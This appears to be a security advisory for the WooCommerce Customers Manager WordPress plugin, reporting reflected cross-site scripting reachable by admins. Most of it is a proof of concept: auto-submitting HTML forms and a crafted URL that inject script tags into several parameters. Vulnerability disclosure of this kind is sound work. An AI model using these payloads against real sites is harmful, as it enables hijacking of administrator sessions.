Description The plugin does not sanitise and escape various parameters before outputting them back in pages and attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin
Make a logged in admin open the HTML page/URLs below
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=woocommerce-customers-manager" method="POST">
<input type="text" name="page" value='"><script>alert(/XSS-page/)</script>'>
<input type="text" name="wccm_customers_ids" value='"><script>alert(/XSS-wccm_customers_ids/)</script>'>
<input type="submit" value="submit">
</form>
</body>
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/?page=woocommerce-customers-manager&action=customer_details" method="POST">
<input type="text" name="page" value='"><script>alert(/XSS/)</script>'>
<input type="submit" value="submit">
</form>
</body>
https://example.com/wp-admin/admin.php?page=woocommerce-customers-manager&action=wccm-customer-metadata&customer="><script>alert(/XSS/)</script>